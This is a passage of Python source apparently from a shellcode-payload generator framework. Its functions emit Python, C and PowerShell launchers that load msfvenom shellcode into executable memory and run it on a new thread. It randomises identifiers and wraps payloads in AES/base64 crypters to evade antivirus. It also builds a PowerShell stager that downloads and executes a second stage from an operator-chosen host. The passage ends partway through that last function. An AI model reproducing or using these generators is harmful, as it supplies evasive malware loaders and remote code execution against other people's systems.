	def generate(self):
		"""Return the source text of a Python launcher for the configured shellcode.

		The emitted script (Python 2 codecs) base64-decodes the embedded blob,
		un-escapes it, copies it into a VirtualAlloc'd region that is both
		writable and executable, and starts it on a new thread.  Identifier
		names inside the emitted script are randomised on every call, so two
		calls never return the same text.

		Reads self.shellcode (an object with a generate() method) and
		self.required_options (option name -> [value, ...]).  Returns a str.
		"""
		
		# Generate Shellcode Using msfvenom
		Shellcode = self.shellcode.generate()
		
		# Base64 Encode Shellcode
		# NOTE(review): the emitted script runs .decode('base64') and then
		# .decode('string_escape') on this value, so Shellcode is expected to
		# be "\x.." escape text (a Python 2 str), not raw bytes -- confirm
		# against self.shellcode.generate().
		EncodedShellcode = base64.b64encode(Shellcode)    

		# Generate Random Variable Names
		ShellcodeVariableName = randomizer.randomString()
		RandPtr = randomizer.randomString()
		RandBuf = randomizer.randomString()
		RandHt = randomizer.randomString()
					
		# Everything appended from here on is source text of the *generated*
		# script; none of it executes in this process.
		PayloadCode = 'import ctypes\n'
		PayloadCode +=  'import base64\n'
		PayloadCode += RandT + " = \"" + EncodedShellcode + "\"\n"
		PayloadCode += ShellcodeVariableName + " = bytearray(" + RandT + ".decode('base64','strict').decode(\"string_escape\"))\n"
		# 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE: one
		# RWX allocation that is then written and executed -- the memory
		# pattern behavioural AV/EDR rules commonly flag.
		PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + ShellcodeVariableName + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
		PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName  + ')).from_buffer(' + ShellcodeVariableName + ')\n'
		PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
		# The thread's start address is the allocated buffer itself; c_int(-1)
		# is INFINITE, so the emitted script blocks until that thread exits.
		PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
		PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'

		# Optionally wrap the finished launcher in the pyherion crypter.
		if self.required_options["use_pyherion"][0].lower() == "y":
			PayloadCode = crypters.pyherion(PayloadCode)

		return PayloadCode
def cVirtualAlloc():
    """Write a C launcher for the msfvenom shellcode to ./payload.c and compile it.

    The emitted program copies the embedded bytes into a VirtualAlloc'd
    region that is writable and executable and runs them on a new thread.
    Side effects only: overwrites payload.c in the current working directory
    without checking for an existing file, then calls csupport.compilemingw().
    Returns None.
    """
    # Generate Shellcode Using msfvenom
    Shellcode = shellcode.genShellcode()

    # Generate Random Variable Names
    # NOTE(review): none of these three names is referenced in the emitted C
    # below -- they look like leftovers copied from a sibling generator.
    RandShellcode = randomizer.randomString()
    RandReverseShell = randomizer.randomString()
    RandMemoryShell = randomizer.randomString()

    # Start creating our C payload
    # Fixed file name in the cwd; open() raises IOError if the directory is
    # not writable and nothing here handles that or closes the file on error.
    PayloadFile = open("payload.c", "w")
    PayloadFile.write("#include <windows.h>\n")
    PayloadFile.write("#include <stdio.h>\n")
    PayloadFile.write("#include <string.h>\n")
    PayloadFile.write("int main()\n")
    PayloadFile.write("{\n")
    PayloadFile.write("    LPVOID lpvAddr;\n")
    PayloadFile.write("    HANDLE hHand;\n")
    PayloadFile.write("    DWORD dwWaitResult;\n")
    PayloadFile.write("    DWORD threadID;\n\n")
    PayloadFile.write("unsigned char buff[] = \n")
    # The shellcode is embedded as a "\x.."-escaped C string literal, so the
    # compiler, not this script, turns it into bytes.
    PayloadFile.write('"' + Shellcode + '";\n\n')
    # 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE.
    PayloadFile.write("lpvAddr = VirtualAlloc(NULL, strlen(buff),0x3000,0x40);\n")
    PayloadFile.write("RtlMoveMemory(lpvAddr,buff, strlen(buff));\n")
    PayloadFile.write("hHand = CreateThread(NULL,0,lpvAddr,NULL,0,&threadID);\n")
    PayloadFile.write("dwWaitResult = WaitForSingleObject(hHand,INFINITE);\n")
    PayloadFile.write("return 0;\n")
    PayloadFile.write("}")
    PayloadFile.close()

    # Compile our C code
    # Presumably picks up ./payload.c by convention -- no path is passed.
    csupport.compilemingw()
	def generate(self):
		"""Return the source of a Python launcher with the shellcode embedded verbatim.

		Unlike the base64 variant, the shellcode escape text is placed directly
		inside a bytearray('...') literal, so the Python parser of the emitted
		script does the un-escaping.  The script then allocates an RWX region
		with VirtualAlloc, copies the bytes in and runs them on a new thread.

		Side effect: (re)creates self.shellcode.  Also reads
		self.required_options.  Returns a str of Python source.
		"""
		
		# Generate Shellcode Using msfvenom
		self.shellcode = shellcode.Shellcode()
		Shellcode = self.shellcode.generate()
		
		# Generate Random Variable Names
		ShellcodeVariableName = randomizer.randomString()
		RandPtr = randomizer.randomString()
		RandBuf = randomizer.randomString()
		RandHt = randomizer.randomString()
		
		# Create Payload code
		# Everything appended below is text of the generated script.
		PayloadCode = 'import ctypes\n'
		# Shellcode is expected to be "\x.." escape text; a raw byte string
		# containing a quote or newline would break the emitted literal.
		PayloadCode += ShellcodeVariableName +' = bytearray(\'' + Shellcode + '\')\n'
		# 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE.
		PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ ShellcodeVariableName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
		PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
		PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
		# Thread start address is the allocated buffer; c_int(-1) is INFINITE.
		PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
		PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'

		# Optionally wrap the finished launcher in the pyherion crypter.
		if self.required_options["use_pyherion"][0].lower() == "y":
			PayloadCode = crypters.pyherion(PayloadCode)

		return PayloadCode
def pyVirtualAlloc():
    """Write a Python launcher for the msfvenom shellcode to ./payload.py.

    The emitted script embeds the shellcode escape text in a bytearray
    literal, copies it into a VirtualAlloc'd RWX region and runs it on a new
    thread.  Side effects only: overwrites payload.py in the current working
    directory, then calls supportfiles.supportingFiles() and
    messages.endmsg().  Returns None.
    """
    # Generate Shellcode Using msfvenom
    Shellcode = shellcode.genShellcode()
    
    # Generate Random Variable Names
    ShellcodeVariableName = randomizer.randomString()
    RandPtr = randomizer.randomString()
    RandBuf = randomizer.randomString()
    RandHt = randomizer.randomString()

    # Create Payload File
    # Fixed file name in the cwd; an existing payload.py is silently replaced
    # and an IOError from open() is not handled.
    PayloadFile = open('payload.py', 'w')
    PayloadFile.write('#!/usr/bin/python\n\n')
    PayloadFile.write('import ctypes\n\n')
    # Shellcode is expected to be "\x.." escape text so that it survives
    # being placed inside a single-quoted literal.
    PayloadFile.write(ShellcodeVariableName +' = bytearray(\'' + Shellcode + '\')\n\n')
    # 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE.
    PayloadFile.write(RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ ShellcodeVariableName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n\n')
    PayloadFile.write(RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n\n')
    PayloadFile.write('ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n\n')
    # Thread start address is the allocated buffer; c_int(-1) is INFINITE.
    PayloadFile.write(RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n\n')
    PayloadFile.write('ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))')
    PayloadFile.close()

    # Create Supporting Files and Print Exit Message
    supportfiles.supportingFiles()
    messages.endmsg()
	def generate(self):
		"""Return the source text of a C launcher for the configured shellcode.

		The emitted program embeds the shellcode as a "\\x.."-escaped string
		literal, copies it into a VirtualAlloc'd region that is writable and
		executable, and runs it on a new thread.  Nothing is written to disk
		here; the caller is responsible for compiling the returned text.
		Reads self.shellcode.  Returns a str of C source.
		"""
		
		# Generate Shellcode Using msfvenom
		Shellcode = self.shellcode.generate()
		
		# Generate Random Variable Names
		# NOTE(review): these three names are never used in the emitted C
		# below -- dead assignments.
		RandShellcode = randomizer.randomString()
		RandReverseShell = randomizer.randomString()
		RandMemoryShell = randomizer.randomString()

		# Start creating our C payload
		PayloadCode = '#include <windows.h>\n'
		PayloadCode += '#include <stdio.h>\n'
		PayloadCode += '#include <string.h>\n'
		PayloadCode += 'int main()\n'
		PayloadCode += '{\n'
		PayloadCode += '    LPVOID lpvAddr;\n'
		PayloadCode += '    HANDLE hHand;\n'
		PayloadCode += '    DWORD dwWaitResult;\n'
		PayloadCode += '    DWORD threadID;\n\n'
		PayloadCode += 'unsigned char buff[] = \n'
		# The C compiler, not this method, turns the escape text into bytes.
		PayloadCode += '\"' + Shellcode + '\";\n\n'
		# 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE.
		PayloadCode += 'lpvAddr = VirtualAlloc(NULL, strlen(buff),0x3000,0x40);\n'
		PayloadCode += 'RtlMoveMemory(lpvAddr,buff, strlen(buff));\n'
		PayloadCode += 'hHand = CreateThread(NULL,0,lpvAddr,NULL,0,&threadID);\n'
		PayloadCode += 'dwWaitResult = WaitForSingleObject(hHand,INFINITE);\n'
		PayloadCode += 'return 0;\n'
		PayloadCode += '}\n'

		return PayloadCode
def pyAESVAlloc():
    """Write a Python launcher to ./payload.py with the shellcode AES-wrapped.

    The shellcode text is padded, AES-encrypted and base64-encoded here; the
    emitted script carries the key alongside the ciphertext and reverses the
    steps before the usual VirtualAlloc / RtlMoveMemory / CreateThread
    sequence.  Because the key is embedded in the same file, this provides
    no confidentiality -- it only changes the on-disk bytes; an analyst can
    recover the plaintext directly from the script.

    Side effects only: overwrites payload.py in the current working
    directory, then calls supportfiles.supportingFiles() and
    messages.endmsg().  Returns None.
    """
    # Generate Shellcode Using msfvenom
    Shellcode = shellcode.genShellcode()

    # Generate Random Variable Names
    ShellcodeVariableName = randomizer.randomString()
    RandPtr = randomizer.randomString()
    RandBuf = randomizer.randomString()
    RandHt = randomizer.randomString()
    RandDecodeAES = randomizer.randomString()
    RandCipherObject = randomizer.randomString()
    RandDecodedShellcode = randomizer.randomString()
    RandShellCode = randomizer.randomString()
    RandPadding = randomizer.randomString()

    # Set AES Block Size and Padding
    # 32 is a multiple of AES's 16-byte block, so the cipher accepts the
    # padded length; the pad byte is a literal '{' rather than PKCS#7.
    BlockSize = 32
    Padding = '{'

    # Function for Padding Encrypted Text to Fit the Block
    # Always appends at least one pad character.  rstrip('{') on the other
    # side cannot distinguish padding from genuine trailing '{' bytes.
    pad = lambda s: s + (BlockSize - len(s) % BlockSize) * Padding

    # Encrypt & Encode or Decrypt & Decode a String
    EncodeAES = lambda c, s: base64.b64encode(c.encrypt(pad(s)))
    DecodeAES = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(Padding)   # defined for symmetry; unused here

    # Generate Random AES Key
    secret = aes.aesKey()

    # Create Cipher Object with Generated Secret Key
    # No mode argument: PyCrypto's AES.new defaults to ECB.
    cipher = AES.new(secret)

    # Encrypt the String
    EncodedShellcode = EncodeAES(cipher, Shellcode)

    # Create Payload File
    # Fixed file name in the cwd; an existing payload.py is silently replaced.
    PayloadFile = open('payload.py', 'w')
    PayloadFile.write('#!/usr/bin/python\n\n')
    PayloadFile.write('import ctypes\n')
    PayloadFile.write('from Crypto.Cipher import AES\n')
    PayloadFile.write('import base64\n')
    PayloadFile.write('import os\n\n')
    PayloadFile.write(RandPadding + ' = \'{\'\n') 
    PayloadFile.write(RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n')
    # The key is written into the script in the clear.
    PayloadFile.write(RandCipherObject + ' = AES.new(\'' + secret + '\')\n')
    PayloadFile.write(RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n')
    # Decrypted text is still "\x.." escape text, hence the Python 2
    # string_escape decode before it becomes a bytearray.
    PayloadFile.write(RandShellCode + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n\n')
    # 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE.
    PayloadFile.write(RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + RandShellCode + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n\n')
    PayloadFile.write(RandBuf + ' = (ctypes.c_char * len(' + RandShellCode + ')).from_buffer(' + RandShellCode + ')\n\n')
    PayloadFile.write('ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + RandShellCode + ')))\n\n')
    # Thread start address is the allocated buffer; c_int(-1) is INFINITE.
    PayloadFile.write(RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n\n')
    PayloadFile.write('ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))')    
    PayloadFile.close()

    # Create Supporting Files and Print Exit Message
    supportfiles.supportingFiles()
    messages.endmsg()
    def generate(self):
        """Return the source of a Python launcher with the shellcode embedded verbatim.

        The shellcode escape text is placed directly in a bytearray('...')
        literal; the emitted script allocates an RWX region with VirtualAlloc,
        copies the bytes in and runs them on a new thread.  Identifier names
        in the emitted script are randomised per call.

        Reads self.shellcode and self.required_options.  Returns a str.
        """

        # Generate Shellcode Using msfvenom
        Shellcode = self.shellcode.generate()

        # Generate Random Variable Names
        ShellcodeVariableName = randomizer.randomString()
        RandPtr = randomizer.randomString()
        RandBuf = randomizer.randomString()
        RandHt = randomizer.randomString()

        # Create Payload code
        # Everything appended below is text of the generated script.
        PayloadCode = "import ctypes\n"
        # Shellcode is expected to be "\x.." escape text so it survives being
        # placed inside a single-quoted literal.
        PayloadCode += ShellcodeVariableName + " = bytearray('" + Shellcode + "')\n"
        # 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE.
        PayloadCode += (
            RandPtr
            + " = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len("
            + ShellcodeVariableName
            + ")),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n"
        )
        PayloadCode += (
            RandBuf
            + " = (ctypes.c_char * len("
            + ShellcodeVariableName
            + ")).from_buffer("
            + ShellcodeVariableName
            + ")\n"
        )
        PayloadCode += (
            "ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int("
            + RandPtr
            + "),"
            + RandBuf
            + ",ctypes.c_int(len("
            + ShellcodeVariableName
            + ")))\n"
        )
        # Thread start address is the allocated buffer; c_int(-1) is INFINITE.
        PayloadCode += (
            RandHt
            + " = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int("
            + RandPtr
            + "),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n"
        )
        PayloadCode += "ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(" + RandHt + "),ctypes.c_int(-1))\n"

        # Optionally wrap the finished launcher in the pyherion crypter.
        if self.required_options["use_pyherion"][0].lower() == "y":
            PayloadCode = crypters.pyherion(PayloadCode)

        return PayloadCode
	def generate(self):
		"""Return the source of a minimal C launcher that calls the byte array directly.

		The emitted program declares the shellcode as a global char array and
		casts it to a function pointer -- no allocation or protection change is
		made.  Nothing is written to disk here.  Reads self.shellcode.
		Returns a str of C source.
		"""
		
		# Generate Shellcode Using msfvenom
		Shellcode = self.shellcode.generate()

		# Generate Random Variable Names
		# NOTE(review): these three names are never used in the emitted C
		# below -- dead assignments.
		RandShellcode = randomizer.randomString()
		RandReverseShell = randomizer.randomString()
		RandMemoryShell = randomizer.randomString()

		# Start creating our C payload
		PayloadCode = 'unsigned char payload[]=\n'
		# The C compiler turns the "\x.." escape text into bytes.
		PayloadCode += '\"' + Shellcode + '\";\n'
		PayloadCode += 'int main(void) { ((void (*)())payload)();}\n'
		
		return PayloadCode
	def generate(self):
		"""Run the external Hyperion packer on the configured executable and return the result.

		Invokes hyperion.exe under wine on self.required_options["original_exe"],
		reads the packed file back from settings.TEMP_DIR and deletes it.
		Returns the packed file contents as a str, or "" after printing an
		error and waiting for a key press if the output file does not exist.
		Python 2 code (print statement, raw_input).
		"""
		
		# randomize the output file so we don't overwrite anything
		# Assumes settings.TEMP_DIR already ends with a path separator.
		randName = randomizer.randomString(5) + ".exe"
		outputFile = settings.TEMP_DIR + randName
		
		# the command to invoke hyperion. TODO: windows compatibility
		# NOTE(review): the command is a single string run with shell=True, so
		# a path containing spaces or shell metacharacters is split or
		# interpreted by the shell.  An argument list with shell=False
		# (e.g. ["wine", "hyperion.exe", original_exe, outputFile]) avoids both.
		hyperionCommand = "wine hyperion.exe " + self.required_options["original_exe"][0] + " " + outputFile
		
		print helpers.color("\n[*] Running Hyperion on " + self.required_options["original_exe"][0] + "...")
		
		# be sure to set 'cwd' to the proper directory for hyperion so it properly runs
		# The exit status is never checked; failure is only detected below by
		# the output file being absent.
		p = subprocess.Popen(hyperionCommand, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=settings.VEIL_PATH+"tools/hyperion/", shell=True)
		stdout, stderr = p.communicate()
		
		try:
			# read in the output .exe from /tmp/
			# If read() raises, the handle is not closed; a with-block would be safer.
			f = open(outputFile, 'rb')
			PayloadCode = f.read()
			f.close()
		except IOError:
			# Only stdout is shown; stderr from hyperion/wine is discarded.
			print "\nError during Hyperion execution:\n" + helpers.color(stdout, warning=True)
			raw_input("\n[>] Press any key to return to the main menu:")
			return ""
		
		# cleanup the temporary output file. TODO: windows compatibility
		# os.remove(outputFile) would be portable and avoid the shell entirely.
		p = subprocess.Popen("rm " + outputFile, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
		stdout, stderr = p.communicate()

		return PayloadCode
def pyherion(code):
	"""
	Generates a crypted hyperion'esque version of python code using
	base64 and AES with a random key, wrapped in an exec() dynamic launcher.

	code = the python source code to encrypt

	Returns the encrypted python code as a string.

	The AES key is written into the returned launcher in the clear, so the
	wrapping provides no confidentiality: it only changes the bytes a static
	scanner sees, and the original source can be recovered from the launcher
	itself (base64-decode the outer exec() argument, then decrypt with the
	embedded key).  Python 2 code (str/bytes are the same type here).
	"""

	imports = list()
	codebase = list()
	
	# strip out all imports from the code so pyinstaller can properly
	# launch the code by preimporting everything at compiletime
	# NOTE(review): this is a substring test, so any line containing the word
	# "import" anywhere (inside a string, or in a name such as "important")
	# is hoisted to the top as well -- confirm this is acceptable for callers.
	for line in code.split("\n"):
		if not line.startswith("#"): # ignore commented imports...
			if "import" in line:
				imports.append(line)
			else:
				codebase.append(line)
	
	# generate a random 256 AES key and build our AES cipher
	# No mode argument: PyCrypto's AES.new defaults to ECB.
	key = randomizer.randomKey(32)
	cipherEnc = AES.new(key)

	# encrypt the input file (less the imports)
	# encryption.EncodeAES presumably pads with '{' -- the launcher below
	# strips '{' from the decrypted text, which also removes any genuine
	# trailing '{' characters.
	encrypted = encryption.EncodeAES(cipherEnc, "\n".join(codebase))
	
	# some random variable names
	b64var = randomizer.randomString(5)
	aesvar = randomizer.randomString(5)

	# randomize our base64 and AES importing variable
	imports.append("from base64 import b64decode as %s" %(b64var))
	imports.append("from Crypto.Cipher import AES as %s" %(aesvar))

	# shuffle up our imports
	random.shuffle(imports)
	
	# add in the AES imports and any imports found in the file
	# Joined with ';' onto one line, so every hoisted line must be a
	# standalone import statement.
	crypted = ";".join(imports) + "\n"

	# the exec() launcher for our base64'ed encrypted string
	# Two nested exec() calls: the outer one base64-decodes a one-line script
	# that in turn decrypts and exec()s the real code.  Both the key and the
	# ciphertext are literals inside that inner script.
	crypted += "exec(%s(\"%s\"))" % (b64var,base64.b64encode("exec(%s.new(\"%s\").decrypt(%s(\"%s\")).rstrip('{'))\n" %(aesvar,key,b64var,encrypted)))

	return crypted
def cVoidPointer ():
    """Write a minimal C launcher to ./payload.c and compile it.

    The emitted program declares the shellcode as a global char array and
    casts it to a function pointer -- no allocation or protection change.
    Side effects only: overwrites payload.c in the current working directory
    without checking for an existing file, then calls
    csupport.compilemingw().  Returns None.
    """
    # Generate Shellcode Using msfvenom
    Shellcode = shellcode.genShellcode()

    # Generate Random Variable Names
    # NOTE(review): none of these names is used in the emitted C below.
    RandShellcode = randomizer.randomString()
    RandReverseShell = randomizer.randomString()
    RandMemoryShell = randomizer.randomString()

    # Start creating our C payload
    # Fixed file name in the cwd; IOError from open() is not handled.
    PayloadFile = open('payload.c', 'w')
    PayloadFile.write('unsigned char payload[]=\n')
    # The C compiler turns the "\x.." escape text into bytes.
    PayloadFile.write('\"' + Shellcode + '\";\n')
    PayloadFile.write('int main(void) { ((void (*)())payload)();}')
    PayloadFile.close()

    # Compile our C code
    # Presumably picks up ./payload.c by convention -- no path is passed.
    csupport.compilemingw()
	def generate(self):
		"""Return the source of a Python launcher that calls the shellcode via a ctypes cast.

		The emitted script places the shellcode in a ctypes string buffer and
		casts it to a CFUNCTYPE -- no VirtualAlloc or protection change, so it
		depends on that buffer's memory being executable.  Reads
		self.shellcode and self.required_options.  Returns a str.
		"""
		
		# Generate Shellcode Using msfvenom
		Shellcode = self.shellcode.generate()

		# Generate Random Variable Names
		RandShellcode = randomizer.randomString()
		RandReverseShell = randomizer.randomString()
		RandMemoryShell = randomizer.randomString()
		
		# Everything appended below is text of the generated script.
		PayloadCode = 'from ctypes import *\n'
		# Shellcode is expected to be "\x.." escape text inside a double-quoted literal.
		PayloadCode += RandReverseShell + ' = \"' + Shellcode + '\"\n'
		PayloadCode += RandMemoryShell + ' = create_string_buffer(' + RandReverseShell + ', len(' + RandReverseShell + '))\n'
		PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
		PayloadCode += RandShellcode + '()'
	
		# Optionally wrap the finished launcher in the pyherion crypter.
		if self.required_options["use_pyherion"][0].lower() == "y":
			PayloadCode = crypters.pyherion(PayloadCode)
		
		return PayloadCode
	def generate(self):
		"""Return the source of a Python launcher with the shellcode AES-wrapped.

		The shellcode text is encrypted with a fresh key here; the emitted
		script carries that key next to the ciphertext, decrypts and
		un-escapes it, then runs the usual VirtualAlloc / RtlMoveMemory /
		CreateThread sequence.  Because the key is in the same file the
		wrapping provides no confidentiality, only different on-disk bytes.

		Side effect: (re)creates self.shellcode.  Reads
		self.required_options.  Returns a str of Python source.
		"""
		
		# Generate Shellcode Using msfvenom
		self.shellcode = shellcode.Shellcode()
		Shellcode = self.shellcode.generate()
		
		# Generate Random Variable Names
		ShellcodeVariableName = randomizer.randomString()
		RandPtr = randomizer.randomString()
		RandBuf = randomizer.randomString()
		RandHt = randomizer.randomString()
		RandDecodeAES = randomizer.randomString()
		RandCipherObject = randomizer.randomString()
		RandDecodedShellcode = randomizer.randomString()
		RandShellCode = randomizer.randomString()
		RandPadding = randomizer.randomString()
		
    
		# Generate Random AES Key
		secret = randomizer.randomKey()

		# Create Cipher Object with Generated Secret Key
		# No mode argument: PyCrypto's AES.new defaults to ECB.
		cipher = AES.new(secret)
		
		# encryption.EncodeAES presumably pads with '{' and base64-encodes;
		# the emitted decoder below reverses exactly that.
		EncodedShellcode = encryption.EncodeAES(cipher, Shellcode)
		
		# Create Payload code
		# Everything appended below is text of the generated script.
		PayloadCode = 'import ctypes\n'
		PayloadCode += 'from Crypto.Cipher import AES\n'
		PayloadCode += 'import base64\n'
		PayloadCode += 'import os\n'
		PayloadCode += RandPadding + ' = \'{\'\n'
		PayloadCode += RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n'
		# The key is written into the script in the clear.
		PayloadCode += RandCipherObject + ' = AES.new(\'' + secret + '\')\n'
		PayloadCode += RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n'
		# Decrypted text is still "\x.." escape text, hence the Python 2
		# string_escape decode before it becomes a bytearray.
		PayloadCode += RandShellCode + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n'
		# 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE.
		PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + RandShellCode + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
		PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + RandShellCode + ')).from_buffer(' + RandShellCode + ')\n'
		PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + RandShellCode + ')))\n'
		# Thread start address is the allocated buffer; c_int(-1) is INFINITE.
		PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
		PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
		
		# Optionally wrap the finished launcher in the pyherion crypter.
		if self.required_options["use_pyherion"][0].lower() == "y":
			PayloadCode = crypters.pyherion(PayloadCode)

		return PayloadCode
	def generate(self):
		"""Write a PowerShell second stage to disk and return the one-line downloader text.

		Builds a PowerShell script that allocates memory via Add-Type P/Invoke,
		copies the shellcode in byte by byte and starts a thread, writes it
		(as a `powershell -Enc` line) to veil.PAYLOAD_SOURCE_PATH under a
		random name, and returns operator-facing text containing the
		base64-encoded downloader commands that fetch it over plain HTTP from
		the configured DownloadHost/DownloadPort.

		Side effects: (re)creates self.shellcode, writes one file, sets
		self.notes.  Python 2 code (unicode()).  Returns a str of notes, not
		the payload itself.
		"""

		self.shellcode = shellcode.Shellcode()
		shellcode = self.shellcode.generate()
		# Rewrite the "\x41\x42" escape text as "0x41,0x42" for a [Byte[]]
		# literal: split on the backslash, glue with ",0", drop the leading comma.
		shellcode = ",0".join(shellcode.split("\\"))[1:]
		
		baseString = """$c = @"
[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr w, uint x, uint y, uint z);
[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr u, uint v, IntPtr w, IntPtr x, uint y, IntPtr z);
[DllImport("msvcrt.dll")] public static extern IntPtr memset(IntPtr x, uint y, uint z);
"@
$o = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru
$x=$o::VirtualAlloc(0,0x1000,0x3000,0x40); [Byte[]]$sc = %s;
for ($i=0;$i -le ($sc.Length-1);$i++) {$o::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1) | out-null;}
$z=$o::CreateThread(0,0,$x,0,0,0); Start-Sleep -Second 100000""" % (shellcode)

		# `powershell -Enc` expects base64 of UTF-16LE text.  Appending a NUL
		# after every character reproduces that only for ASCII input, which
		# is all this template contains.
		powershell_command  = unicode(baseString)
		blank_command = ""
		for char in powershell_command:
			blank_command += char + "\x00"
		powershell_command = blank_command
		powershell_command = base64.b64encode(powershell_command)

		payloadName = randomizer.randomString()
		
		# write base64 payload out to disk
		# NOTE(review): this bare expression does nothing (no-op statement).
		veil.PAYLOAD_SOURCE_PATH
		# Assumes PAYLOAD_SOURCE_PATH ends with a path separator.
		secondStageName = veil.PAYLOAD_SOURCE_PATH + payloadName
		f = open( secondStageName , 'w')
		f.write("powershell -Enc %s\n" %(powershell_command))
		f.close()
		
		
		# give notes to the user
		self.notes = "\n\tsecondary payload written to " + secondStageName + " ,"
		self.notes += " serve this on http://%s:%s\n" %(self.required_options["DownloadHost"][0], self.required_options["DownloadPort"][0],)
		
		
		# build our downloader shell
		# Unauthenticated cleartext fetch-and-exec; same UTF-16LE widening as above.
		downloaderCommand = "iex (New-Object Net.WebClient).DownloadString(\"http://%s:%s/%s\")\n" %(self.required_options["DownloadHost"][0], self.required_options["DownloadPort"][0], payloadName)
		powershell_command = unicode(downloaderCommand)
		blank_command = ""
		for char in powershell_command:
			blank_command += char + "\x00"
